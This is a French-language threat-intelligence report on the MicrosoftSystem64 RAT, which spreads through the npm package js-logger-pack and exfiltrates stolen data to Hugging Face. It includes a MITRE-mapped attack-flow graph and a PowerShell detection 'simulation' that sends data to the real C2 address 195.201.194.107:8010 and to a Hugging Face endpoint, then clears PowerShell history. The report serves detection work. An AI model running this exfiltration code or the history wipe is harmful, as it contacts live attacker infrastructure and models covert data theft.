MicrosoftSystem64 : Un RAT de la chaîne d’approvisionnement exfiltrant des données vers Hugging Face

SOC Prime Team

Suivre

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

Un package npm malveillant nommé js-logger-pack a été utilisé pour distribuer une application exécutable unique Node.js multiplateforme appelée MicrosoftSystem64. Le binaire fonctionne comme un cheval de Troie d’accès à distance complet, capable de voler des extensions de portefeuille de cryptocurrent, des identifiants stockés dans le navigateur, des clés SSH, des données de session Telegram et des captures d’écran. Les informations volées sont exfiltrées par le biais de jeux de données privés de Hugging Face utilisant un jeton d’API compromis, tandis que le trafic de commande-et-contrôle est géré via un serveur WebSocket à 195.201.194.107:8010. La campagne a été liée à un acteur de menace associé à la Corée du Nord qui fait tourner les comptes npm et Hugging Face pour conserver l’accès et soutenir les opérations.

Enquêter

SafeDep a analysé l’échantillon de malware et extrait sa configuration chiffrée par XOR, le point de terminaison de commande-et-contrôle, le jeton Hugging Face, et une liste de plus de 80 IDs d’extension de portefeuille ciblés. Les chercheurs ont également examiné les méthodes de persistance utilisées sur les systèmes Windows, macOS et Linux et reconstruit la chaîne complète d’exfiltration impliquant les API de Hugging Face. Une validation en direct le 28 mai a confirmé que des ensembles de données actifs continuaient de recevoir des captures d’écran et des archives d’identifiants prises à partir de victimes réelles.

Atténuation

Les organisations devraient immédiatement supprimer tout package npm malveillant connu lié à cette campagne, faire tourner les identifiants compromis, les clés SSH, et les graines de portefeuille de cryptocurrent, et surveiller toute activité non autorisée de l’API Hugging Face. Les protections des points de terminaison devraient détecter le nom du processus MicrosoftSystem64 et toute création de tâche planifiée associée. Les contrôles réseau devraient également bloquer le trafic sortant vers l’adresse IP de commande-et-contrôle identifiée et restreindre l’accès inattendu aux points de terminaison Hugging Face à partir de binaires inconnus.

Réponse

Si MicrosoftSystem64 est détecté, isolez immédiatement le système affecté, terminez le processus malveillant, supprimez les fichiers installés et les tâches planifiées, et révoquez le jeton compromis Hugging Face. Les enquêteurs devraient rassembler des preuves médico-légales à partir des journaux et de tout chemin de données exfiltré, puis notifier les parties prenantes concernées et mettre à jour les outils de balayage de dépendance pour bloquer les packages malveillants dans les futures constructions.

graph TB %% Définition des classes classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9966 classDef infra fill:#ff9999 %% Nœuds outils et malware tool_npm[« Outil – paquet npm `js-logger-pack` Description contient le binaire SEA `MicrosoftSystem64` »] class tool_npm tool malware_binary[« Malware – binaire `MicrosoftSystem64` Description ELF multiplateforme empaqueté en SEA Node.js avec configuration chiffrée XOR »] class malware_binary malware infra_c2[« Infrastructure – C2 WebSocket IP 195.201.194.107 port 8010 »] class infra_c2 infra %% Nœuds d’action init_supply_chain[« Action – T1195.001 compromission de la chaîne d’approvisionnement L’attaquant publie le paquet npm malveillant `js-logger-pack` contenant le binaire SEA »] class init_supply_chain action execution_ingress[« Action – T1105 transfert d’outil entrant La victime installe le paquet et exécute le binaire Node.js intégré »] class execution_ingress action defense_obfuscation[« Action – T1027.009 / T1027.004 fichiers ou informations obfusqués ELF empaqueté en SEA avec configuration XOR chiffrée »] class defense_obfuscation action persistence_mechanisms[« Action – T1547.001 / T1547.014 / T1543.001 / T1543.002 persistance Création de clés Run, Active Setup, LaunchAgent macOS et service systemd Linux »] class persistence_mechanisms action defense_hide[« Action – T1564.014 dissimulation d’artefacts & T1497.002 évasion de sandbox Utilisation d’attributs étendus et vérifications d’activité utilisateur »] class defense_hide action priv_esc[« Action – élévation de privilèges via mécanismes de persistance Réutilisation de clé Run ou service pour obtenir des privilèges élevés »] class priv_esc action cred_browser[« Action – T1217 découverte des informations navigateur & T1555.003 identifiants navigateur Vol de données Chrome, Edge, Firefox et extensions de portefeuilles crypto »] class cred_browser action keylogging[« Action – T1056.001 keylogging Enregistrement des frappes clavier et du presse-papiers sur Windows/macOS/Linux »] class keylogging action collection_clip_video[« Action – T1115 données presse-papiers & T1125 capture vidéo Captures d’écran toutes les 60 secondes et surveillance du presse-papiers »] class collection_clip_video action collection_db[« Action – T1213.006 données de bases de données Extraction des bases navigateur, clés SSH, Telegram tdata et autres données »] class collection_db action c2_communication[« Action – T1105 communication C2 Connexion WebSocket C2 vers 195.201.194.107:8010 »] class c2_communication action exfiltration_hf[« Action – exfiltration via API HuggingFace Téléversement des données volées vers le compte `jpeek998` »] class exfiltration_hf action impact_resource[« Action – T1496.001 détournement de ressources Vol de credentials de portefeuilles crypto pour usage illégal »] class impact_resource action %% Flux tool_npm –>|livre| malware_binary malware_binary –>|active| init_supply_chain init_supply_chain –>|conduit à| execution_ingress execution_ingress –>|conduit à| defense_obfuscation defense_obfuscation –>|conduit à| persistence_mechanisms persistence_mechanisms –>|active| defense_hide defense_hide –>|active| c2_communication persistence_mechanisms –>|active| priv_esc priv_esc –>|conduit à| cred_browser cred_browser –>|conduit à| keylogging keylogging –>|conduit à| collection_clip_video collection_clip_video –>|conduit à| collection_db collection_db –>|conduit à| c2_communication c2_communication –>|utilise| infra_c2 c2_communication –>|conduit à| exfiltration_hf exfiltration_hf –>|résultat| impact_resource

Flux d’attaque

Narratif de l’Attaque & Commandes :
Un attaquant a déjà installé le “Microsoft System64 RAT” sur l’hôte Windows compromis. Pour exfiltrer les données volées, le RAT effectue deux actions parallèles :
1. Canal C2 : Ouvre une socket TCP brute vers le serveur malveillant codé en dur 195.201.194.107 sur le port 8010 et diffuse les données encodées en base-64.
2. Exfil HTTP Covert : Émet une requête HTTPS POST à https://huggingface.co/api/upload avec les mêmes données intégrées dans le corps de la requête, utilisant un agent-utilisateur à apparence légitime pour se fondre dans le trafic normal.
Les deux actions génèrent des événements de pare-feu sortants qui correspondent à la règle Sigma.

Script de Test de Régression :

# -------------------------------------------------
# Simulation d'Exfiltration du RAT System64 (PowerShell)
# -------------------------------------------------
# 1. Préparer des données d'exfil amoins
$data = "SecretData$(Get-Date -Format o)" | ConvertTo-Json
$b64   = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($data))

# 2. Envoyer les données via TCP brut (C2)
$c2Ip   = "195.201.194.107"
$c2Port = 8010
try {
    $tcpClient = New-Object System.Net.Sockets.TcpClient($c2Ip, $c2Port)
    $stream    = $tcpClient.GetStream()
    $bytes     = [Text.Encoding]::UTF8.GetBytes($b64)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Close()
    $tcpClient.Close()
    Write-Host "[+] TCP exfil envoyé à $c2Ip:$c2Port"
} catch {
    Write-Error "[-] Échec de la connexion TCP : $_"
}

# 3. Envoyer les données via HTTPS vers HuggingFace (exfil en cachette)
$uri = "https://huggingface.co/api/upload"
try {
    Invoke-WebRequest -Uri $uri `
        -Method POST `
        -Body @{ data = $b64 } `
        -Headers @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } `
        -UseBasicParsing
    Write-Host "[+] Exfil HTTP envoyé à huggingface.co"
} catch {
    Write-Error "[-] Échec de la requête HTTP : $_"
}

Commandes de Nettoyage :

# Supprimer tout artefact réseau restant
Get-NetTCPConnection -RemoteAddress 195.201.194.107 -RemotePort 8010 |
    ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }

# Effacer l'historique PowerShell (optionnel)
Clear-History

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement